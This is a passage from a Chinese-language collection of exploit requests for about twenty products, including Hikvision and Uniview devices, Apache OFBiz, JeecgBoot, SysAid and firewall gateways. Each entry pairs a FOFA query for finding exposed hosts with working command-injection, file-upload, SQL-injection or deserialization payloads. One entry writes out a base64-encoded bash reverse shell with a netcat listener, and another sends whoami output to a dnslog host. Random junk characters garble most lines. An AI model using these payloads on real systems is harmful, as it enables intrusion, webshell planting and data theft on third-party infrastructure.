3 h! K1 f% }4 e0 |4 u0 r! FYsOxWxSvj1KyZow1PTsh98fdu6l
: I! @% c- B' ]9 o5 ~------YsOxWxSvj1KyZow1PTsh98fdu6l- e& ~- u/ @8 w# T# M# s% M z
Content-Disposition: form-data; name="target"6 L8 h1 c2 J% Y. @4 r" K
+ l' Z( T( e6 O* a2 o/Applications/SkillDevelopAndEHS/
9 C* @. N5 z S6 A1 G, W1 g1 ~! }------YsOxWxSvj1KyZow1PTsh98fdu6l--! T# B5 X3 F. Y( @0 E; i5 B8 o
- g9 ^) q) V" ~7 M
7 o( l {! t) p2 l' ~: H
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
; k% H" m8 w) k" j& \Host: x.x.x.x5 x9 g( b' T, l; A6 n# S6 _: ]7 Q
7 L8 m5 O4 v1 P' q& g% Q
7 e' d% y0 N$ c* }; k/ t% u6 ]& {79. BYTEVALUE 百为流控路由器远程命令执行
: b( ~# Y4 N3 G. n. }" _- oFOFA:BYTEVALUE 智能流控路由器7 K- V/ t! k* ]. m2 k
GET /goform/webRead/open/?path=|id HTTP/1.1
9 q7 X! b% I' Z! }6 QHost:IP1 e# e, C0 H% O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
% u: v+ Y# e! f0 b0 {* X5 y) G; @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 i# Q2 `) c+ p" v4 K; R3 UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 K& r$ v/ N, X* c0 iAccept-Encoding: gzip, deflate1 h: s* ?0 T, j7 X+ f
Connection: close' j0 H! }- w3 Q0 l9 v' t
Upgrade-Insecure-Requests: 1
9 u0 e6 {3 z4 t% [) ?, a2 r- T2 _8 M/ M7 t3 Q6 c
! e: p& X+ e7 u2 Q+ `0 T o$ m; q. j
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
( ?5 k" F0 L8 Q- K+ [$ A# EFOFA:app="速达软件-公司产品"! p: Y8 l8 M- [
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
( ^/ I+ S" }* `7 y4 l% C: @4 NHost: x.x.x.x
0 X1 ~# K& F! _- }! x, C& X$ xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; G& N: ^. s" t! b; W$ P; w2 U
Content-Length: 27
( |& U) j+ I6 O8 U: v+ ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
E# R6 g: W4 r) FAccept-Encoding: gzip, deflate
4 f4 x$ u; i9 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
U9 i# K8 V2 a# @: UConnection: close
; U+ L; I7 S' \: O; C( y5 r2 i7 D9 fContent-Type: application/octet-stream4 v6 O: _) F! C
Upgrade-Insecure-Requests: 1
' z) t6 ~- t7 m- D/ k) H
7 P2 b6 |( G [! B7 `( @8 o<% out.print("oessqeonylzaf");%>
! G+ l' V4 o7 c& u1 Y: U
; h3 r6 I7 f" ?* [& x! d
. `) v0 Z6 Q& r9 K# G; ^: l1 UGET /xykqmfxpoas.jsp HTTP/1.1
; T( S S e3 H0 ]* UHost: x.x.x.x) @ `4 I$ e( L# w9 l7 K) w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( H/ R/ a: p( r9 K6 {% j7 O" NConnection: close; e; [0 b" W* F9 F
Accept-Encoding: gzip
6 t2 V9 L0 N8 t" m- w/ ~) d1 Y( P y" |
/ a& u$ i0 \5 W# m4 |* |81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 B3 V3 L" L6 C
FOFA:app="uniview-视频监控", N% n5 a6 K; N% ~3 ^( C
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.17 V# }5 K% e" c1 e9 R5 t
Host: x.x.x.x! e2 h! k& ]6 m+ X b5 J' z: \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 N$ @+ I" x+ aConnection: close9 A" V. M1 O2 @+ K
Accept-Encoding: gzip
* U4 t3 M5 M. H+ v# h. h* F/ O6 H+ r0 T# L _3 P# y3 @2 v
8 q/ ]3 ?5 R0 ^, Y/ q3 `. A" |82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
% X5 U, y6 p; c$ P+ oFOFA:app="思福迪-LOGBASE", M- E' A$ w; k: {# [& }# A' h0 ]
POST /bhost/test_qrcode_b HTTP/1.1
4 r _9 S0 u% i1 L" p' NHost: BaseURL: z$ M0 S' ] ?. e$ Z& `+ a
User-Agent: Go-http-client/1.1
0 X0 D3 k2 Q) D/ J$ \9 @Content-Length: 23
& V0 {! ^+ x4 b+ JAccept-Encoding: gzip0 b( [- C% Y+ d1 t
Connection: close
0 j V1 b @( |2 r: IContent-Type: application/x-www-form-urlencoded
& Q1 J7 t+ z" y: R! QReferer: BaseURL
' q& D* {# o# s2 i4 X/ _7 I9 i/ X4 C Y" M9 M$ B' |$ x. M/ J- O8 g
z1=1&z2="|id;"&z3=bhost
. v" N m! E' D# j* x2 L+ H- G& r: t) R$ d j j
' f3 b; ]+ C5 d' a T! f
83. JeecgBoot testConnection 远程命令执行
/ Y$ u/ } M- R- aFOFA:title=="JeecgBoot 企业级低代码平台"8 j7 y0 v3 M2 j( R
" \! `% A$ o8 H5 M& D1 c# k% M
% a; U5 m1 X& [% s1 xPOST /jmreport/testConnection HTTP/1.1; q3 B9 n( e! i
Host: x.x.x.x
1 n. p; L) C9 F7 N+ ^! I G0 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* E/ \9 {4 U$ L3 EConnection: close. o6 C8 l# a, p" A# s0 Y1 P
Content-Length: 8881
* H/ }' I Q/ aAccept-Encoding: gzip
' D! m# v( o9 \6 c( O% [Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
' t# G' b/ X2 X; nContent-Type: application/json: ?. P- a$ l5 g& M8 M, R! [; K/ b
; P! o$ X: B+ ^
PAYLOAD5 e$ o+ S* L! _# i$ O0 k8 U8 d
% G0 r2 g u- x) A, N* l6 D84. Jeecg-Boot JimuReport queryFieldBySql 模板注入7 i8 G. W' B+ o+ t
FOFA:title=="JeecgBoot 企业级低代码平台"
$ S6 [* z6 A, B5 C& \$ P
5 c( H! r" g* J: i+ B
7 o/ i& @( `+ A7 [
9 l) @8 d( v' BPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
2 P! a3 H! v$ h0 LHost: 192.168.40.130:8080
0 `3 R3 a" t" L: _% g! W" W0 |8 {User-Agent: curl/7.88.18 A/ g0 S' G- |+ Q1 i2 l
Content-Length: 1565 V4 U% ?. Z* U: K7 N" }
Accept: */*
7 I! Y# L! |6 MConnection: close
: k& ]" ] f' y) lContent-Type: application/json
5 i. B( ?4 A$ Z# ]( K3 s( pAccept-Encoding: gzip
% a) U( T* {5 L0 k2 }& `- Y7 v3 }
8 s' e" W* I4 [5 H& C{
7 J. u( T: ` I N) } "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
. z/ c8 \2 m# e: i- q" L "type": "0"& Y+ Q; {4 D6 q$ `' V
}
* t+ M# Y# p7 s @+ C- c2 [; s% d/ N6 P
0 h8 P5 S* x8 ]% R+ J85. SysAid On-premise< 23.3.36远程代码执行
0 Z7 K' z: d' U/ y2 z! g1 G0 iCVE-2023-47246
& _' w4 @4 C6 s, I' NFOFA:body="sysaid-logo-dark-green.png" 0 O& K4 ~2 g. \
EXP数据包如下,注入哥斯拉马$ _& _+ ]: a8 L5 O" d% l
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1; ~* V1 z2 v3 m5 c# k/ a
Host: x.x.x.x6 W0 g$ B9 G1 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% u: A7 J0 {2 t6 P
Content-Type: application/octet-stream
% I9 Z$ s3 C' l8 o* B( ]Accept-Encoding: gzip
0 l7 T7 ~) ^7 E0 _' L" }& W* N4 I( t! U9 U
PAYLOAD+ \7 B/ H$ b9 g
* N7 }* Z- B( X ?1 }
回显URL:http://x.x.x.x/userfiles/index.jsp
/ h3 W0 w* T9 A8 p5 S( ?' }# V: w, }
86. 日本tosei自助洗衣机RCE
) w& [- O$ U- w I/ R3 HFOFA:body="tosei_login_check.php"# X6 R6 e/ E; V
POST /cgi-bin/network_test.php HTTP/1.1 g+ Q- t _. j- A, D' G
Host: x.x.x.x
& x: f3 D! N- H [' g) _5 A! R. e2 NUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
; D5 Z( e a. [4 w" |# z kConnection: close
' H' Q A( s2 A/ _Content-Length: 44
* h0 K @, g6 Y& TAccept: */*- F+ n7 D' {0 y4 m
Accept-Encoding: gzip
: e* U4 U7 \, c1 A* OAccept-Language: en
3 c, z( ]* N: E( {* G+ l, q4 _Content-Type: application/x-www-form-urlencoded, p3 m+ P b1 ^% q
: r6 s \% R9 S8 n' D: s% e- { M
host=%0acat${IFS}/etc/passwd%0a&command=ping8 f1 ]+ g. A h7 J" |$ z
0 y# u( e' J/ d! B/ C) { n& [/ p2 l/ O3 i Q( \3 O% p
87. 安恒明御安全网关aaa_local_web_preview文件上传3 f! @$ e5 F. u& j6 M3 ~
FOFA:title="明御安全网关"$ H1 s( }9 _) B" D8 @
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
: C+ [0 h: V- L% W: zHost: X.X.X.X( h7 D4 T. k' P2 U! V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 T, z [, i6 v: fConnection: close2 C5 v" E- p4 e6 k
Content-Length: 198. g" M! F4 i6 a+ [( z
Accept-Encoding: gzip
8 g4 D/ F$ Q1 c. J) @* V+ SContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd% A# v* X; f- T) p1 S
, N; H" g6 v+ K
--qqobiandqgawlxodfiisporjwravxtvd
/ F. _8 M8 l( X% ^5 I* \Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"# I7 Y8 ^' J2 f8 h) ~6 ?- ?5 O
Content-Type: text/plain7 q; U! i7 x+ S* z% _
' L: i/ i! x, r& r' M' b: W- v, a2ZqGNnsjzzU2GBBPyd8AIA7QlDq
9 I4 r3 ?6 Z! f+ z- k& ~2 [+ L--qqobiandqgawlxodfiisporjwravxtvd--% V! s1 l$ D/ b8 `/ j
. k" U" B* R- W) t6 m' u0 @! g( g" F, k4 L$ _
/jfhatuwe.php
$ q6 `1 N* v3 x- `& H6 A# P0 R2 D6 b' D U: Y% k2 W7 P
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行% c+ u0 F3 U0 g5 e8 q' o
FOFA:title="明御安全网关" f9 z! R) d$ ]% F$ m% S
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
# k+ j4 P. u2 A8 d7 b; A3 kHost: x.x.x.xx.x.x.x6 V- {) w2 L1 J# s9 d& \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 _8 r. B5 Y3 l7 ^7 [/ n: m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) u& D5 I* i4 M" x9 X/ kAccept-Encoding: gzip, deflate2 f7 b; a, s+ J6 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 S+ R2 r8 I B9 L' a' l2 U
Connection: close2 ~& h2 V: a# t7 v7 t
0 d, B, f5 `" ?+ @$ J9 ^
; Z" w& X. L" I$ `) l: t7 G
/astdfkhl.php7 ~# k2 O' S [( g% N; G) a
% W6 |2 ~5 _# x$ j9 T89. 致远互联FE协作办公平台editflow_manager存在sql注入
2 [! M; z Y: W, U' ?6 R; K" EFOFA:title="FE协作办公平台" || body="li_plugins_download"
. t/ V0 [- d% S) b' G7 PPOST /sysform/003/editflow_manager.js%70 HTTP/1.1- Z7 p) z! O. l1 l7 a
Host: x.x.x.x. Z3 d" W* U M3 G6 z; o/ ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% M8 T8 l3 L* B/ PConnection: close# i- ^; K8 L+ A1 @/ O' U# E
Content-Length: 41
+ p$ u0 J) t8 z' ], j" J( b FContent-Type: application/x-www-form-urlencoded" k! I% [1 j% d' a
Accept-Encoding: gzip
& T: F4 h# D* I# H x, M9 u& q- g9 V. ~
7 m1 S9 O, o' |/ v) boption=2&GUID=-1'+union+select+111*222--+6 C3 T G% S& M' m$ b- @* x; r' K
$ h! @9 a S3 y p9 s5 ]9 Y8 j! j
3 X& f, V2 c$ ~3 ?0 h90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
3 V. p( z* i& u( J; I, j6 gFOFA:icon_hash="-1830859634"
. C2 G7 {8 X. \4 V, d ?$ i1 u" _POST /php/ping.php HTTP/1.1. ], A5 M2 W& S0 C6 | n
Host: x.x.x.x
( e8 m5 T# l5 j/ k! ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" w$ a- @ N; x0 K: A$ J9 |% I6 H% q
Content-Length: 511 X( |6 ~* H* N6 m
Accept: application/json, text/javascript, */*; q=0.01$ b+ \) x" B$ ?
Accept-Encoding: gzip, deflate
8 y$ e! L; U3 u4 c3 E# g6 w) qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% ?9 L. ?! m( x1 V3 e- I5 j' j0 dConnection: close
5 H1 m( f/ ~5 H8 l4 |Content-Type: application/x-www-form-urlencoded* }- L8 @* \3 B7 q4 m0 v
X-Requested-With: XMLHttpRequest2 U! `8 h3 g) b
6 ^7 N4 F& v2 w6 t" J5 |; [% g( h8 b
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig; N8 L# @" [, r8 U/ K. m, T- E# s
3 @ E8 q% t0 d" _% }0 x5 m
7 x" o; P5 A b7 p M F
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取! P! G+ k1 |7 @" g9 [6 l4 w6 h
FOFA:title="综合安防管理平台"
$ L9 f+ p" }6 O, kGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
4 o5 ~4 |$ ^% S% ]9 f0 ^ E0 r' aHost: your-ip
4 a9 A% B( ~4 w& x& n8 c- pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.365 k4 q6 I( W m8 i% s) L
Accept-Encoding: gzip, deflate! L; I( a, m, n- R4 e. o% d9 e
Accept: */*+ B" i; Z; J3 }
Connection: keep-alive
' p) k0 h8 u% r5 l) y+ I/ ?
# g! `) e6 }/ I/ p# z. @" M9 G( B* N6 `8 O' l
( ^0 Q& [$ h: j8 D92. 海康威视运行管理中心session命令执行
6 u3 f. R0 Y3 D; ~4 l! O- r, u) g: U1 XFastjson命令执行
) y( b& J. l* w6 b0 F; |hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"( j' x; P/ Q$ J) f0 Y, X7 z V O
POST /center/api/session HTTP/1.1
: P H# g: U3 \Host:5 U! q& H% C2 T: V3 T1 V5 @5 F" b0 p
Accept: application/json, text/plain, */*9 |% I5 D e. Y9 m
Accept-Encoding: gzip, deflate5 Q$ c7 a: ]$ J: a4 r$ D
X-Requested-With: XMLHttpRequest
7 B5 S/ e9 ]- ?" g. q9 s$ T+ PContent-Type: application/json;charset=UTF-8
8 t" O6 [: z/ C e% y1 C% n& xX-Language-Type: zh_CN( C2 G' G* _* s
Testcmd: echo test
0 \6 G4 Y' r7 R7 I; e4 n8 W" VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3 p% \5 h+ a" q0 {1 z; k t7 tAccept-Language: zh-CN,zh;q=0.9* c/ P; i- q5 \ q( s/ U; { Y
Content-Length: 5778
, i6 O3 h# z. M3 y2 n
! ]& F q9 X# L" K3 _: EPAYLOAD
* y1 f: y+ c( R. O! A8 H/ m
* f" t, Q* v5 C
3 M6 r1 d+ I3 ?( X, y( O93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传2 _. y- X8 O: y) }+ a
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="9 b/ D# T) |9 ~7 c N& C9 W
POST /?g=app_av_import_save HTTP/1.1% Q6 ~/ R9 x2 f) a* x+ z, H
Host: x.x.x.x
% L" j; B- @0 k( ^8 C8 v% i; ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
) e$ g9 \- \ ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" b" x% w2 ^0 ?. R. J
6 }4 u$ y$ g& R. k* p3 R0 Z------WebKitFormBoundarykcbkgdfx
- Y5 h7 A9 {3 {: `: r0 NContent-Disposition: form-data; name="MAX_FILE_SIZE"
; n8 |3 X; @ T s l
- \2 l, `* o; b2 k10000000
' c3 h: J) F& A, s2 H* X------WebKitFormBoundarykcbkgdfx
. p) U+ ] h- _7 DContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
; R1 q. U9 w8 q! S' rContent-Type: text/plain$ u% \ m6 d) D3 f4 v+ w& C0 U
$ Y) y( s' i; U, K/ dwagletqrkwrddkthtulxsqrphulnknxa6 g: p* d. R" X* `
------WebKitFormBoundarykcbkgdfx
3 q: B# q8 M- U+ y. ]4 ~5 Y& N9 FContent-Disposition: form-data; name="submit_post"
' H3 S! r! O; Z% Z3 A- Z4 O, o5 v5 p. k d: F5 w
obj_app_upfile
" k5 O5 Z1 B" y3 P2 V& v" E( C------WebKitFormBoundarykcbkgdfx
* U3 X2 B% F0 \9 ]Content-Disposition: form-data; name="__hash__"
% |+ d0 T7 |& H `3 W9 f! p& u) j A. d0 J: B
0b9d6b1ab7479ab69d9f71b05e0e9445
# s( p' b. b; `( k------WebKitFormBoundarykcbkgdfx--/ H4 {( K" X1 z u4 o
4 K4 I! X2 M2 ]+ T- t/ S' [9 m2 n
& a# }( t0 m M" g( X) N/ O9 s7 V
GET /attachements/xlskxknxa.txt HTTP/1.1
5 O3 s# J# u1 n+ k7 d, u7 ]Host: xx.xx.xx.xx7 F( j5 j/ W# P( B3 f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 d9 d5 s5 |" u3 O% q% Y; C2 L% @
& A" ~% L/ N: K8 N- E; Z; C# w94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
2 w; z- ^. x7 wFOFA:fid="1Lh1LHi6yfkhiO83I59AYg==": ^ f. W/ W( V2 P
POST /?g=obj_area_import_save HTTP/1.1
! B$ X' P: a6 Q1 ?4 PHost: x.x.x.x% h% g0 h$ L' c& }
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt" b) y, W" K9 W. ~7 J/ z, r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+ ]7 X& s( R9 N6 E" W: Y4 ?1 i
' i1 v) F: F& b( V4 i' v& r------WebKitFormBoundarybqvzqvmt
1 J9 X# \7 P4 e7 S5 ^' yContent-Disposition: form-data; name="MAX_FILE_SIZE"$ R* y: \$ `. J; w
- n& Z" U6 a9 {4 ~, o+ @10000000
' W& Y) o( h1 c- V9 B7 R! E4 ^- u------WebKitFormBoundarybqvzqvmt2 S/ F5 ]+ ]2 y. y* t' v
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
! ]. b% w5 e0 [) W4 dContent-Type: text/plain
' S" h0 b( y! O0 l+ Q
C3 c# M6 F/ `pxplitttsrjnyoafavcajwkvhxindhmu
) b& l0 g1 M3 x6 x* m7 h+ _------WebKitFormBoundarybqvzqvmt
- O Y( X/ n* T9 x nContent-Disposition: form-data; name="submit_post"4 ~$ ?+ v& D$ p! c" b
8 W( r; ^0 ?6 ^% G8 s2 j. R) L5 fobj_app_upfile
7 v# l, }+ `* c. h/ B4 q2 U------WebKitFormBoundarybqvzqvmt
9 d2 }4 W1 j6 T) K% vContent-Disposition: form-data; name="__hash__"" N( p' U. ?' t, e- t
& e; Y# s$ k! w; d, w f) A0b9d6b1ab7479ab69d9f71b05e0e9445
$ ~- [$ x# H. Q$ e5 ~------WebKitFormBoundarybqvzqvmt--
0 |) H) @$ G$ ^$ m; E' Q7 `
6 P% ?- ]% t, ?, @/ g/ E1 k$ h
) l; `3 o% v7 r7 Y! x' @$ w; ?: c2 e
/ a) u0 e. L& B/ Y; B/ g- v( hGET /attachements/xlskxknxa.txt HTTP/1.1
( b+ E; u; [, Y+ B) `Host: xx.xx.xx.xx
5 I+ Q5 p; |; E: l) t+ L" E! g# S. ]- n: WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 u" F# n' M8 W/ @
* c2 @7 K6 p( I
! w, b3 B a* P3 m5 t5 S& [7 ^5 r. r3 j8 C( X! y/ P7 [7 I( K
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
" l& \3 Z* L) b2 M: m: u T! q: [CVE-2023-49070
( A" ], Z# @: |2 O. r* sFOFA:app="Apache_OFBiz"3 C" N! t: B8 b# ~) {
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.16 Y4 f' k* d' [3 \6 d1 @
Host: x.x.x.x" @) x* ^, d0 B ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. D) P0 i' L- U
Connection: close# |% ]( E* X7 I1 |3 A; I6 a
Content-Length: 889
, M- J# n* f. ?$ VContent-Type: application/xml
- n" i W/ Z+ |" b- |7 SAccept-Encoding: gzip; p) u) [( P' D. W# p
6 o( M: A6 V& c2 M+ @* ^2 }<?xml version="1.0"?>
& @0 u2 ^7 ?6 n- J6 v3 l" Q3 E<methodCall>
$ m) F$ M( z3 x4 N2 V6 u- u+ b <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>8 u, I3 k2 E% P4 L" r/ J# t
<params>
& d7 d6 b9 N' n; ]* z# G; N9 L' d) w <param>
0 e# `* t% S, q }6 @0 y' N <value>& N( I" W* N7 H8 v/ }8 L; j
<struct>
9 U$ F* y# j/ Y# b* } <member>+ R6 z/ {2 T2 {0 M
<name>test</name>
0 q# f! B- o; f: }8 r- h <value>
7 L: H) I, T q* _( x5 h) P; j <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>' _, P; S( p- t' x5 [
</value>
- i( q. q$ r( ^0 b# t% N: j </member>
. C' H' q3 L. r </struct>3 R; s$ W. c; a) C$ ^5 d `8 b
</value>
$ w8 y) J" {/ }4 C1 K </param>% V# q! s8 {+ f3 [- z
</params>* ]) ^: ^' o% R h @
</methodCall>
( K- X# r Q$ M: u
; C a- |" }8 E( g9 B. B$ Z" r) H
, z6 O" B7 c/ [用ysoserial生成payload
- ?5 q3 o W" q1 n! V! W' x! ?java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
! `& r% U: k e/ f& b
7 D$ D# L8 O$ y5 I
7 L0 d6 b; g& b) i; }% i将生成的payload替换到上面的POC
8 S8 X: _7 J. w8 k y5 r9 M/ e5 P8 nPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1: i3 g9 r2 ~) H8 v' a
Host: 192.168.40.130:8443
% l- J" o" n8 W OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 @4 C8 f# E3 P7 o" PConnection: close. n7 s8 X1 o: v# U1 B: |
Content-Length: 889
3 t) U! G7 D/ {6 Z* h% NContent-Type: application/xml
2 n$ z) x: d$ W; k; @& U5 GAccept-Encoding: gzip* }: S- l' Q% }1 G! V
5 ?4 r, U9 ^" M" B, P* \$ ~1 l
PAYLOAD; W/ B3 R# J& _0 P6 `6 p
9 F* u/ y0 V% b. `0 b$ E z
96. Apache OFBiz 18.12.11 groovy 远程代码执行4 V: p) W$ e* H; Q
FOFA:app="Apache_OFBiz"$ F. t+ r9 ~6 r7 o# E# t( C
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; ~7 |7 v5 |# |$ Z
Host: localhost:8443
" f) \7 |, w' P! S# E6 K/ p( LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: O* S' J" ^6 T+ \5 @9 r
Accept: */*
2 P* @) E4 w5 q( O! DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ ], r( T4 ?% j6 ~7 U# J! v
Content-Type: application/x-www-form-urlencoded$ b# c) o( a* Z! Z$ K# x: h$ P
Content-Length: 55! V y7 `0 m1 e% }- g# Z8 G1 j+ i
6 Z( `; O1 |" t* N, ?groovyProgram=throw+new+Exception('id'.execute().text);# \9 f6 z3 Q, Y' Y7 T/ Z# Q, z. g
" i3 r$ u% A4 }! c5 ~
2 h. u) C$ X3 N( M
反弹shell4 v# v/ {2 w8 v- E$ ^. r! Y
在kali上启动一个监听; j' a" x0 R8 a3 r5 @/ I
nc -lvp 7777
' C! @' k- {3 `1 k/ `* H ^5 X! }1 C, h; I, N5 D
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.15 j/ M- r. V% P e" c/ H0 r
Host: 192.168.40.130:84439 I8 w* O1 ?/ J5 Q+ p o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 l+ X" _& [/ O6 h" G1 ]Accept: */*
; \( b) |8 d, F5 v0 O: o8 Y& F$ iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 A/ @' o* J4 R6 JContent-Type: application/x-www-form-urlencoded
( v0 _* S. c J* AContent-Length: 71. p g1 @* g7 T! g, g
& X9 x& A! q. l* \) |& o" \groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
; {9 n9 s- ^* e1 c
; |* V5 E1 j; O, g% f/ M# }97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
" C5 W9 a4 h, J# x% E# IFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"# Y. S1 I# R! D# Z
GET /passport/login/ HTTP/1.12 Q$ D; {0 [9 l6 M) F0 K, P1 ?
Host: 192.168.40.130:8085/ `7 {. Z8 w% S# y- O+ N5 P" a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 X1 K9 D! a# m1 l5 l) E" W
Accept-Encoding: gzip6 Y1 v) U, @4 D5 v6 q$ j
Connection: close1 N" l4 h3 N: Y4 X7 L5 O* `$ n
Cookie: rememberMe=PAYLOAD C G$ t b3 W( G% r0 v( w- H
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
+ t4 U8 _! `2 P) _* P2 E
7 ]& V, \ n2 O+ W) a' `( i5 k# }# ~
98. SpiderFlow爬虫平台远程命令执行- A& H3 q' i. O* {% E2 f/ r
CVE-2024-0195# c. _ Y8 x6 e
FOFA:app="SpiderFlow"! d% I$ }$ `: _1 v$ T4 ~
